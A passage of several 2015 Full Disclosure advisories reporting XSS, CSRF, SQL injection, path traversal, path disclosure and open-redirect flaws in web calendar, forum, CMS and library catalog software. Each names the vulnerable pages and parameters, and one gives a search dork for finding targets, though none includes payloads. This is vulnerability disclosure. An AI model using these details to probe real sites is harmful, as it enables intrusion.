CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Writer and Reporter: Wang Jing [CCRG, Nanyang Technological University
(NTU), Singapore]







*Suggestion Details:*


*(1) Vendor & Product Description:*


*Vendor:*
Proverbs



*Product & Vulnerable Versions:*
Proverbs Web Calendar
1.0.0
1.1
1.2.2
2.1
2.1.2



*Vendor URL:*
http://www.proverbs.biz/



*Download:*
Proverbs Web Calendar can be obtained from here,
http://www.proverbsllc.com/demos/calendar/calendar.php
http://www.hotscripts.com/listing/proverbs-web-calendar/
http://www.c-point.com/free_php_scripts/calendar.php
http://www.html.it/articoli/proverbs-php-web-calendar-v-100-1/



*Product Introduction Overview:*
"This is a web event calendar developed using PHP and powered by MySQL. The
calendar is viewed in month format initially with a detailed view of daily
events as each calendar day is clicked on. The calendar is customizable
within a single file; allowing changes to the title, color choices,
calendar language, starting day of the week, time format(24hr/12hr), time
zone display and more"






*(2) Vulnerability Details:*
Proverbs Web Calendar web application has a security bug problem. It can be
exploited by XSS attacks. This may allow a remote attacker to create a
specially crafted request that would execute arbitrary script code in a
user's browser session within the trust relationship between their browser
and the server.

Several Proverbs Web Calendar products 0-day vulnerabilities have been
found by some other bug hunter researchers before. Proverbs has patched
some of them. The milw00rm.com is archive of exploits, videos, papers and
vulnerabilities. It has published suggestions, advisories, solutions
details related to Proverbs Web Calendar vulnerabilities.


*(2.1)* The first code programming flaw occurs at "/calendar.php" page with
"&day", "&month" and "&year" parameters.






*References:*
http://www.tetraph.com/security/xss-vulnerability/proverbs-web-calendar-2-1-2-xss-cross-site-scripting-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/04/proverbs-web-calendar-212-xss-cross.html
http://www.inzeed.com/kaleidoscope/computer-web-security/proverbs-web-calendar-2-1-2-xss-cross-site-scripting-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/proverbs-web-calendar-2-1-2-xss-cross-site-scripting-security-vulnerabilities/
https://hackertopic.wordpress.com/2015/04/02/proverbs-web-calendar-2-1-2-xss-cross-site-scripting-security-vulnerabilities/
http://static-173-79-223-25.washdc.fios.verizon.net/?l=full-disclosure&m=142576259903051&w=2
http://packetstormsecurity.com/files/130856/724CMS-5.01-4.59-4.01-3.01-Cross-Site-Scripting.html
https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01737.html
http://milw00rm.com/exploits/7076





--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] 6kbbs v8.0 XSS (Cross-site Scripting) Security Vulnerabilities

[Jing Wang]

*6kbbs v8.0 XSS (Cross-site Scripting) Security Vulnerabilities*


Exploit Title: 6kbbs XSS (Cross-site Scripting) Security Vulnerabilities
Vendor: 6kbbs
Product: 6kbbs
Vulnerable Versions: v7.1   v8.0
Tested Version: v7.1   v8.0
Advisory Publication: April 02, 2015
Latest Update: April 02, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Writer and Reporter: Wang Jing [CCRG, Nanyang Technological University
(NTU), Singapore]







*Suggestion Details:*


*(1) Vendor & Product Description:*


*Vendor:*
6kbbs



*Product & Vulnerable Versions:*
6kbbs
v7.1
v8.0



*Vendor URL & download:*
6kbbs can be obtained from here,
http://www.6kbbs.com/download.html
http://code.google.com/p/6kbbs/downloads/list



*Product Introduction Overview:*
"6kbbs V8.0 is a PHP + MySQL built using high-performance forum, has the
code simple, easy to use, powerful, fast and so on. It is an excellent
community forum program. The program is simple but not simple; fast, small;
Interface generous and good scalability; functional and practical pursuing
superior performance, good interface, the user's preferred utility
functions."

"1, using XHTML + CSS architecture, so that the structure of the page,
saving transmission static page code, but also easy to modify the
interface, more in line with WEB standards; 2, the Forum adopted Cookies,
Session, Application and other technical data cache on the forum, reducing
access to the database to improve the performance of the Forum. Can carry
more users simultaneously access; 3, the data points table function, reduce
the burden on the amount of data when accessing the database; 4, support
for multi-skin style switching function; 5, the use of RSS technology to
support subscriptions forum posts, recent posts, user's posts; 6, the
display frame mode + tablet mode, the user can choose according to their
own preferences to; 7. forum page optimization keyword search, so the forum
more easily indexed by search engines; 8, extension, for our friends to
provide a forum for a broad expansion of space services; 9, webmasters can
add different top and bottom of the ad, depending on the layout; 10, post
using HTML + UBB way the two editors, mutual conversion, compatible with
each other; ..."




*(2) Vulnerability Details:*
6kbbs web application has a security bug problem. It can be exploited by
XSS attacks. This may allow a remote attacker to create a specially crafted
request that would execute arbitrary script code in a user's browser
session within the trust relationship between their browser and the server.

Several 6kbbs products 0-day vulnerabilities have been found by some other
bug hunter researchers before. 6kbbs has patched some of them. The
milw00rm.com is archive of exploits, videos, papers and vulnerabilities. It
has published suggestions, advisories, solutions details related to 6kbbs
vulnerabilities.


*(2.1)* The first code programming flaw occurs atoccurs at "/userlist.php?"
page with "&orderby" parameter.





*References:*
http://www.tetraph.com/security/xss-vulnerability/6kbbs-v8-0-xss-cross-site-scripting-security-vulnerabilities/
http://securityrelated.blogspot.sg/2015/04/6kbbs-v80-xss-cross-site-scripting.html?view=sidebar
http://www.inzeed.com/kaleidoscope/computer-web-security/6kbbs-v8-0-xss-cross-site-scripting-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/6kbbs-v8-0-xss-cross-site-scripting-security-vulnerabilities/
https://hackertopic.wordpress.com/2015/04/02/6kbbs-v8-0-xss-cross-site-scripting-security-vulnerabilities/
http://marc.info/?a=139222176300014&r=1&w=4
http://packetstormsecurity.com/files/authors/11717
https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01759.html
http://milw00rm.com/exploits/6673




--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] 6kbbs v8.0 Multiple CSRF (Cross-Site Request Forgery) Security Vulnerabilities

[Jing Wang]

*6kbbs v8.0 Multiple CSRF (Cross-Site Request Forgery) Security
Vulnerabilities*


Exploit Title: 6kbbs Multiple CSRF (Cross-Site Request Forgery) Security
Vulnerabilities
Vendor: 6kbbs
Product: 6kbbs
Vulnerable Versions: v7.1   v8.0
Tested Version: v7.1   v8.0
Advisory Publication: April 02, 2015
Latest Update: April 02, 2015
Vulnerability Type: Cross-Site Request Forgery (CSRF) [CWE-352]
CVE Reference: *
CVSS Severity (version 2.0):
CVSS v2 Base Score: 6.8 (MEDIUM) (AV:N/AC:M/Au:N/C:P/I:P/A:P) (legend)
Impact Subscore: 6.4
Exploitability Subscore: 8.6
Writer and Reporter: Wang Jing [CCRG, Nanyang Technological University
(NTU), Singapore]







*Suggestion Details:*


*(1) Vendor & Product Description:*


*Vendor:*
6kbbs



*Product & Vulnerable Versions:*
6kbbs
v7.1
v8.0



*Vendor URL & download:*
6kbbs can be gain from here,
http://www.6kbbs.com/download.html
http://en.sourceforge.jp/projects/sfnet_buzhang/downloads/6kbbs.zip/



*Product Introduction Overview:*
"6kbbs V8.0 is a PHP + MySQL built using high-performance forum, has the
code simple, easy to use, powerful, fast and so on. It is an excellent
community forum program. The program is simple but not simple; fast, small;
Interface generous and good scalability; functional and practical pursuing
superior performance, good interface, the user's preferred utility
functions."

"1, using XHTML + CSS architecture, so that the structure of the page,
saving transmission static page code, but also easy to modify the
interface, more in line with WEB standards; 2, the Forum adopted Cookies,
Session, Application and other technical data cache on the forum, reducing
access to the database to improve the performance of the Forum. Can carry
more users simultaneously access; 3, the data points table function, reduce
the burden on the amount of data when accessing the database; 4, support
for multi-skin style switching function; 5, the use of RSS technology to
support subscriptions forum posts, recent posts, user's posts; 6, the
display frame mode + tablet mode, the user can choose according to their
own preferences to; 7. forum page optimization keyword search, so the forum
more easily indexed by search engines; 8, extension, for our friends to
provide a forum for a broad expansion of space services; 9, webmasters can
add different top and bottom of the ad, depending on the layout; 10, post
using HTML + UBB way the two editors, mutual conversion, compatible with
each other; ..."




*(2) Vulnerability Details:*
6kbbs web application has a security bug problem. It can be exploited by
CSRF (Cross-Site Request Forgery) attacks. This may allow an attacker to
trick the victim into clicking on the image to take advantage of the trust
relationship between the authenticated victim and the application. Such an
attack could trick the victim into creating files that may then be called
via a separate CSRF attack or possibly other means, and executed in the
context of their session with the application, without further prompting or
verification.

Several 6kbbs products 0-day vulnerabilities have been found by some other
bug hunter researchers before. 6kbbs has patched some of them. Open Sourced
Vulnerability Database (OSVDB) is an independent and open-sourced database.
The goal of the project is to provide accurate, detailed, current, and
unbiased technical information on security vulnerabilities. The project
promotes greater, open collaboration between companies and individuals. It
has published suggestions, advisories, solutions details related to 6kbbs
vulnerabilities.


*(2.1) *The first code programming flaw occurs at
"/portalchannel_ajax.php?" page with "&id" and &code" parameters in HTTP
$POST.

*(2.2) *The second code programming flaw occurs at "/admin.php?" page with
"&fileids" parameter in HTTP $POST.






*References:*
http://www.tetraph.com/security/csrf-vulnerability/6kbbs-v8-0-multiple-csrf-cross-site-request-forgery-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/04/6kbbs-v80-multiple-csrf-cross-site.html
http://www.inzeed.com/kaleidoscope/computer-web-security/6kbbs-v8-0-multiple-csrf-cross-site-request-forgery-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/6kbbs-v8-0-multiple-csrf-cross-site-request-forgery-security-vulnerabilities/
https://hackertopic.wordpress.com/2015/04/02/6kbbs-v8-0-multiple-csrf-cross-site-request-forgery-security-vulnerabilities/
http://static-173-79-223-25.washdc.fios.verizon.net/?a=139222176300014&r=1&w=2
http://packetstormsecurity.com/files/authors/11270
http://www.osvdb.org/show/osvdb/105842
http://milw00rm.com/exploits/7889




--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisc

[FD] ECE Projects XSS (Cross-site Scripting) Security Vulnerabilities

[Jing Wang]

*ECE Projects XSS (Cross-site Scripting) Security Vulnerabilities*


Exploit Title: ECE Projects XSS (Cross-site Scripting) Security
Vulnerabilities
Vendor: ECE Projektmanagement G.m.b.H. & Co. KG (ECE)
Product: ECE Projects
Vulnerable Versions:
Tested Version:
Advisory Publication: April 01, 2015
Latest Update: April 01, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Writer and Reporter: Wang Jing [CCRG, Nanyang Technological University
(NTU), Singapore]




*Suggestion Details:*


*(1) Vendor & Product Description:*


*Vendor:*
ECE Projektmanagement G.m.b.H. & Co. KG (ECE)


*Product & Version:*
All Projects - Shopping & Office, Traffic, Industries, Hotel, Residential


*Vendor URL & download:*
ECE Projects can be obtained from here,
http://www.ece.com/en/projects/all-projects/


*Google Dork:*
ECE Projektmanagement GmbH & Co. KG


*Product Introduction Overview:*
"ECE develops, builds, and manages large commercial properties in the
business areas Shopping, Office, Traffic, and Industries. It was founded in
1965 by mail-order pioneer Prof. Werner Otto (1909-2011) and is owned by
the Otto family. Since 2000, the company founder's son, Alexander Otto, has
been heading the company. Hamburg-based ECE has been developing, building,
leasing out, and managing large commercial properties in the business areas
Shopping, Office, Traffic, and Industries and is European market leader in
the field of downtown shopping centers. For decades, ECE has been realizing
very successfully large group headquarters, office buildings, industrial
buildings, logistic centers, traffic-related properties, hotels and other
highly complex building types. ECE provides all real estate-related
services from one source and thus creates a major benefit for their
customers, clients and partners by pooling their complete know-how. With
regard to numerous projects the ECE group acts as investor and keeps the
projects in the portfolio for decades. Furthermore, two ECE funds
concentrate on the acquisition of shopping centers with value growth
potential. ECE is Europe-wide successfully positioned with numerous
subsidiaries and joint ventures."

"ECE employs specialists with in-depth knowledge of the retail trade and
all related "disciplines" and pools this wide-ranging expertise under one
roof. Our full-service concept extends from the original idea right through
to long-term management. Our credo: a full range of services from a single
provider who takes overall responsibility as opposed to a "coordinator".
This expertise is underpinned by several decades of experience in the
sector as well as the financial strength of the ECE Group and enables us to
cater to the full range of needs and requirements of our clients."



*(2) Vulnerability Details:*
ECE web application has a security bug problem. It can be exploited by XSS
attacks. This may allow a remote attacker to create a specially crafted
request that would execute arbitrary script code in a user's browser
session within the trust relationship between their browser and the server.

Several ECE Projects products 0Day vulnerabilities have been found by some
other bug hunter researchers before. ECE Projects patched some of them.
Open Sourced Vulnerability Database (OSVDB) is an independent and
open-sourced database. The goal of the project is to provide accurate,
detailed, current, and unbiased technical information on security
vulnerabilities. The project promotes greater, open collaboration between
companies and individuals. It has published suggestions, advisories,
solutions details related to XSS vulnerabilities.


*(2.1)* The first code programming flaw occurs atoccurs at "suchergebnis/?"
page with "&tx_solr[q]" parameter.






*References:*
http://www.tetraph.com/security/xss-vulnerability/ece-projects-xss-cross-site-scripting-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/04/ece-projects-xss-cross-site-scripting.html
http://www.inzeed.com/kaleidoscope/computer-web-security/ece-projects-xss-cross-site-scripting-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/ece-projects-xss-cross-site-scripting-security-vulnerabilities/
https://hackertopic.wordpress.com/2015/04/02/ece-projects-xss-cross-site-scripting-security-vulnerabilities/
http://static-173-79-223-25.washdc.fios.verizon.net/?a=139222176300014&r=1&w=2
http://packetstormsecurity.com/files/authors/11717
http://www.osvdb.org/show/osvdb/119707




--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Arc

[FD] 724CMS 5.01 Multiple XSS (Cross-site Scripting) Security Vulnerabilities

[Jing Wang]

*724CMS 5.01 Multiple XSS (Cross-site Scripting) Security Vulnerabilities*


Exploit Title: 724CMS Multiple XSS (Cross-site Scripting) Security
Vulnerabilities
Vendor: 724CMS
Product: 724CMS
Vulnerable Versions: 3.01   4.01   4.59   5.01
Tested Version: 5.01
Advisory Publication: March 15, 2015
Latest Update: March 15, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU),
Singapore]






*Recommendation Details:*


*(1) Vendor & Product Description:*


*Vendor:*
724CMS Enterprise



*Product & Vulnerable Versions:*
724CMS
3.01
4.01
4.59
5.01





*Vendor URL & download:*
724CMS can be purchased from here,
http://724cms.com/



*Product Introduction Overview:*
"724CMS is a content management system (CMS) that has customers spread in
Canada, Japan, Korean, the United States, European and many others. It
allows publishing, editing and modifying content, organizing, deleting as
well as maintenance from a central interface. Meanwhile, 724CMS provides
procedures to manage workflow in a collaborative environment."

"A CMS helps you create and store content in a shared repository. It then
manages the relationships between content items for you (e.g. keeping track
of where they fit into the site hierarchy). Finally, it ensures that each
content item is connected to the right style sheet when it comes to be
published. Some CMSs also provide facilities to track the status of content
items through editorial processes and workflows."






*(2) Vulnerability Details:*
724CMS web application has a security bug problem. It can be exploited by
XSS attacks. This may allow a remote attacker to create a specially crafted
request that would execute arbitrary script code in a user's browser
session within the trust relationship between their browser and the server.

Several 724CMS products vulnerabilities have been found by some other bug
hunter researchers before. 724CMS has patched some of them. The MITRE
Corporation is a not-for-profit company that operates multiple federally
funded research and development centers (FFRDCs), which provide innovative,
practical solutions for some of our nation's most critical challenges in
defense and intelligence, aviation, civil systems, homeland security, the
judiciary, healthcare, and cybersecurity. It has published suggestions,
advisories, solutions details related to 724CMS vulnerabilities.


*(2.1)* The first code programming flaw occurs at "/index.php" page with
"&Lang" parameter.

*(2.2) *The second code programming occurs at "/section.php" page with
"&Lang", "&ID", "&Nav" parameters.








*References:*
http://www.tetraph.com/security/xss-vulnerability/724cms-5-01-multiple-xss-cross-site-scripting-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/03/724cms-501-multiple-xss-cross-site.html
http://www.inzeed.com/kaleidoscope/computer-web-security/724cms-5-01-multiple-xss-cross-site-scripting-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/724cms-5-01-multiple-xss-cross-site-scripting-security-vulnerabilities/
https://computertechhut.wordpress.com/2015/03/14/724cms-5-01-multiple-xss-cross-site-scripting-security-vulnerabilities/
http://marc.info/?l=full-disclosure&m=142576259903051&w=4
https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01737.html
http://en.hackdig.com/?16117.htm






--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/tetraphibious

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] 724CMS 5.01 Multiple SQL Injection Security Vulnerabilities

[Jing Wang]

*724CMS 5.01 Multiple SQL Injection Security Vulnerabilities*


Exploit Title: 724CMS Multiple SQL Injection Security Vulnerabilities
Vendor: 724CMS
Product: 724CMS
Vulnerable Versions: 3.01   4.01   4.59   5.01
Tested Version: 5.01
Advisory Publication: March 14, 2015
Latest Update: March 14, 2015
Vulnerability Type: Improper Neutralization of Special Elements used in an
SQL Command ('SQL Injection') [CWE-89]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 7.5 (HIGH) (AV:N/AC:L/Au:N/C:P/I:P/A:P) (legend)
Impact Subscore: 6.4
Exploitability Subscore: 10.0
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU),
Singapore]







*Recommendation Details:*


*(1) Vendor & Product Description:*


*Vendor:*
724CMS Enterprise



*Product & Vulnerable Versions:*
724CMS
3.01
4.01
4.59
5.01





*Vendor URL & download:*
724CMS can be gain from here,
http://724cms.com/



*Product Introduction Overview:*
"724CMS is a content management system (CMS) that has customers spread in
Canada, Japan, Korean, the United States, European and many others. It
allows publishing, editing and modifying content, organizing, deleting as
well as maintenance from a central interface. Meanwhile, 724CMS provides
procedures to manage workflow in a collaborative environment."

"A CMS helps you create and store content in a shared repository. It then
manages the relationships between content items for you (e.g. keeping track
of where they fit into the site hierarchy). Finally, it ensures that each
content item is connected to the right style sheet when it comes to be
published. Some CMSs also provide facilities to track the status of content
items through editorial processes and workflows."






*(2) Vulnerability Details:*
724CMS web application has a security bug problem. It can be exploited by
SQL Injection attacks. This may allow an attacker to inject or manipulate
SQL queries in the back-end database, allowing for the manipulation or
disclosure of arbitrary data.

Several 724CMS products vulnerabilities have been found by some other bug
hunter researchers before. 724CMS has patched some of them. The MITRE
Corporation is a not-for-profit company that operates multiple federally
funded research and development centers (FFRDCs), which provide innovative,
practical solutions for some of our nation's most critical challenges in
defense and intelligence, aviation, civil systems, homeland security, the
judiciary, healthcare, and cybersecurity. It has phase, votes, comments and
proposed details related to 724CMS vulnerabilities.


*(2.1)* The first cipher programming flaw  occurs at "/index.php" page with
"&Lang", "&ID" parameters.

*(2.2) *The second cipher programming flaw occurs at "/section.php" page
with "&Lang", "&ID" parameters.








*References:*
http://www.tetraph.com/security/sql-injection-vulnerability/724cms-5-01-multiple-sql-injection-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/03/724cms-501-multiple-sql-injection.html
http://www.inzeed.com/kaleidoscope/computer-web-security/724cms-5-01-multiple-sql-injection-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/724cms-5-01-multiple-sql-injection-security-vulnerabilities/
https://computertechhut.wordpress.com/2015/03/14/724cms-5-01-multiple-sql-injection-security-vulnerabilities/
https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01766.html
http://marc.info/?a=139222176300014&r=1&w=4
http://en.1337day.com/exploit/23308






--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/tetraphibious

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] 724CMS 5.01 Directory (Path) Traversal Security Vulnerabilities

[Jing Wang]

*724CMS 5.01 Directory (Path) Traversal Security Vulnerabilities*


Exploit Title: 724CMS /section.php Module Parameter Directory Traversal
Security Vulnerabilities
Vendor: 724CMS
Product: 724CMS
Vulnerable Versions: 3.01   4.01   4.59   5.01
Tested Version: 5.01
Advisory Publication: March 14, 2015
Latest Update: March 14, 2015
Vulnerability Type: Improper Limitation of a Pathname to a Restricted
Directory ('Path Traversal') [CWE-22]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 7.5 (HIGH) (AV:N/AC:L/Au:N/C:P/I:P/A:P) (legend)
Impact Subscore: 6.4
Exploitability Subscore: 10.0
Discover and Author: Wang Jing [CCRG, Nanyang Technological University
(NTU), Singapore]







*Recommendation Details:*


*(1) Vendor & Product Description:*


*Vendor:*
724CMS Enterprise



*Product & Vulnerable Versions:*
724CMS
3.01
4.01
4.59
5.01





*Vendor URL & download:*
724CMS can be bargained from here,
http://724cms.com/



*Product Introduction Overview:*
"724CMS is a content management system (CMS) that has customers spread in
Canada, Japan, Korean, the United States, European and many others. It
allows publishing, editing and modifying content, organizing, deleting as
well as maintenance from a central interface. Meanwhile, 724CMS provides
procedures to manage workflow in a collaborative environment."

"A CMS helps you create and store content in a shared repository. It then
manages the relationships between content items for you (e.g. keeping track
of where they fit into the site hierarchy). Finally, it ensures that each
content item is connected to the right style sheet when it comes to be
published. Some CMSs also provide facilities to track the status of content
items through editorial processes and workflows."






*(2) Vulnerability Details:*
724CMS web application has a security bug problem. It can be exploited by
Directory Traversal - Local File Include (LFI) attacks. A local file
inclusion (LFI) flaw is due to the script not properly sanitizing user
input, specifically path traversal style attacks (e.g. '../../') supplied
to the parameters. With a specially crafted request, a remote attacker can
include arbitrary files from the targeted host or from a remote host . This
may allow disclosing file contents or executing files like PHP scripts.
Such attacks are limited due to the script only calling files already on
the target host.

Several 724CMS products vulnerabilities have been found by some other bug
hunter researchers before. 724CMS has patched some of them. The MITRE
Corporation is a not-for-profit company that operates multiple federally
funded research and development centers (FFRDCs), which provide innovative,
practical solutions for some of our nation's most critical challenges in
defense and intelligence, aviation, civil systems, homeland security, the
judiciary, healthcare, and cybersecurity. It has published suggestions,
advisories, solutions details related to 724CMS vulnerabilities.


*(2.1) *The first cipher programming flaw occurs at "/section.php" page
with "&Module" parameter.









*References:*
http://www.tetraph.com/security/directory-traversal-vulnerability/724cms-5-01-directory-path-traversal-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/03/724cms-501-directory-path-traversal.html
http://www.inzeed.com/kaleidoscope/computer-web-security/724cms-5-01-directory-path-traversal-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/724cms-5-01-directory-path-traversal-security-vulnerabilities/
https://computertechhut.wordpress.com/2015/03/14/724cms-5-01-directory-path-traversal-security-vulnerabilities/
http://marc.info/?a=139222176300014&r=1&w=4
http://en.hackdig.com/wap/?id=17404







--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] 724CMS 5.01 Multiple Information Leakage Security Vulnerabilities

[Jing Wang]

*724CMS 5.01 Multiple Information Leakage Security Vulnerabilities*



Exploit Title: 724CMS Multiple Information Leakage Security Vulnerabilities

Vendor: 724CMS

Product: 724CMS

Vulnerable Versions: 3.01   4.01   4.59   5.01

Tested Version: 5.01

Advisory Publication: March 14, 2015

Latest Update: March 14, 2015

Vulnerability Type: Information Exposure [CWE-200]

CVE Reference: *

Impact CVSS Severity (version 2.0):

CVSS v2 Base Score: 5.0 (MEDIUM) (AV:N/AC:L/Au:N/C:P/I:N/A:N) (legend)

Impact Subscore: 2.9

Exploitability Subscore: 10.0

Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU),
Singapore]








*Suggestion Details:*



*(1) Vendor & Product Description:*



*Vendor:*

724CMS Enterprise




*Product & Vulnerable Versions:*

724CMS

3.01

4.01

4.59

5.01






*Vendor URL & download:*

724CMS can be got from here,

http://724cms.com/




*Product Introduction Overview:*

724CMS is a content management system (CMS) that has large customers spread
in Canada, Japan, Korean, the United States and many others. It allows
publishing, editing and modifying content, organizing, deleting as well as
maintenance from a central interface. Meanwhile, 724CMS provides procedures
to manage workflow in a collaborative environment.







*(2) Vulnerability Details:*

724CMS web application has a security bug problem. It can be exploited by
information leakage attacks - Full Path Disclosure (FPD). This may allow a
remote attacker to disclose the software's installation path. While such
information is relatively low risk, it is often useful in carrying out
additional, more focused attacks.


Several 724CMS products vulnerabilities have been found by some other bug
hunter researchers before. 724CMS has patched some of them. NVD is the U.S.
government repository of standards based vulnerability management data
(This data enables automation of vulnerability management, security
measurement, and compliance (e.g. FISMA)). It has published suggestions,
advisories, solutions related to 724CMS vulnerabilities.



*(2.1)* The first code programming flaw occurs at "index.php" page with
"&Lang", "&ID" parameters.


*(2.2)* The second code programming flaw occurs at "section.php" page with
"&Lang", "&ID" parameters.








*References:*

http://tetraph.com/security/information-leakage-vulnerability/724cms-5-01-information-leakage-security-vulnerabilities/

http://securityrelated.blogspot.com/2015/03/724cms-501-information-leakage-security.html

http://www.inzeed.com/kaleidoscope/computer-web-security/724cms-5-01-information-leakage-security-vulnerabilities/

http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/724cms-5-01-information-leakage-security-vulnerabilities/

https://infoswift.wordpress.com/2015/03/14/724cms-5-01-information-leakage-security-vulnerabilities/

http://marc.info/?l=full-disclosure&m=142576280203098&w=4

http://en.hackdig.com/wap/?id=17055






--

Wang Jing,

Division of Mathematical Sciences (MAS),

School of Physical and Mathematical Sciences (SPMS),

Nanyang Technological University (NTU),

Singapore.

http://www.tetraph.com/wangjing/

https://twitter.com/tetraphibious

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Innovative WebPAC Pro 2.0 Unvalidated Redirects and Forwards (URL Redirection) Security Vulnerabilities

[Jing Wang]

*Innovative WebPAC Pro 2.0 Unvalidated Redirects and Forwards (URL
Redirection) Security Vulnerabilities*


Exploit Title: Innovative WebPAC Pro 2.0 /showres url parameter URL
Redirection Security Vulnerabilities
Vendor: Innovative Interfaces Inc
Product: WebPAC Pro
Vulnerable Versions: 2.0
Tested Version: 2.0
Advisory Publication: March 14, 2015
Latest Update: March 14, 2015
Vulnerability Type: URL Redirection to Untrusted Site ('Open Redirect')
[CWE-601]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 5.8 (MEDIUM) (AV:N/AC:M/Au:N/C:P/I:P/A:N) (legend)
Impact Subscore: 4.9
Exploitability Subscore: 8.6
Discover and Author: Wang Jing [CCRG, Nanyang Technological University
(NTU), Singapore]







*Suggestion Details:*


*(1) Vendor & Product Description:*


*Vendor:*
Innovative Interfaces Inc


*Product & Version:*
WebPAC Pro
2.0


*Vendor URL & Download:*
WebPAC Pro can be got from here,
http://www.iii.com/products/webpac_pro.shtml
http://lj.libraryjournal.com/2005/12/ljarchives/innovative-releasing-webpac-pro/


*Libraries that have installed WebPac Pro:*
https://wiki.library.oregonstate.edu/confluence/display/WebOPAC/Libraries+that+have+installed+WebPac+Pro


*Product Introduction Overview:*
"Today, some libraries want to enhance their online presence in ways that
go beyond the traditional OPAC and the "library portal" model to better
integrate the latest Web functionality. With WebPAC Pro, libraries will be
able to take advantage of the latest Web technologies and engage Web-savvy
users more effectively than ever before. WebPAC Pro is a complete update of
the Web OPAC interface"

"WebPAC Pro breaks through the functional and design limitations of the
traditional online catalog. Its solid technology framework supports tools
for patron access such as Spell Check; integrated Really Simple Syndication
(RSS) feeds; a suite of products for seamless Campus Computing; and deep
control over information content and presentation with Cascading Style
Sheets (CSS). WebPAC Pro is also a platform for participation when
integrated with Innovative's Patron Ratings features and Community Reviews
product. What's more, with WebPAC Pro's RightResult™ search technology, the
most relevant materials display at the top so patrons get to the specific
items or topics they want to explore immediately. WebPAC Pro can also
interconnect with Innovative's discovery services platform, Encore. And for
elegant access through Blackberry® Storm™ or iPhone™, the AirPAC provides
catalog searching, item requesting, and more."





*(2) Vulnerability Details:*
WebPAC Pro web application has a security bug problem. It can be exploited
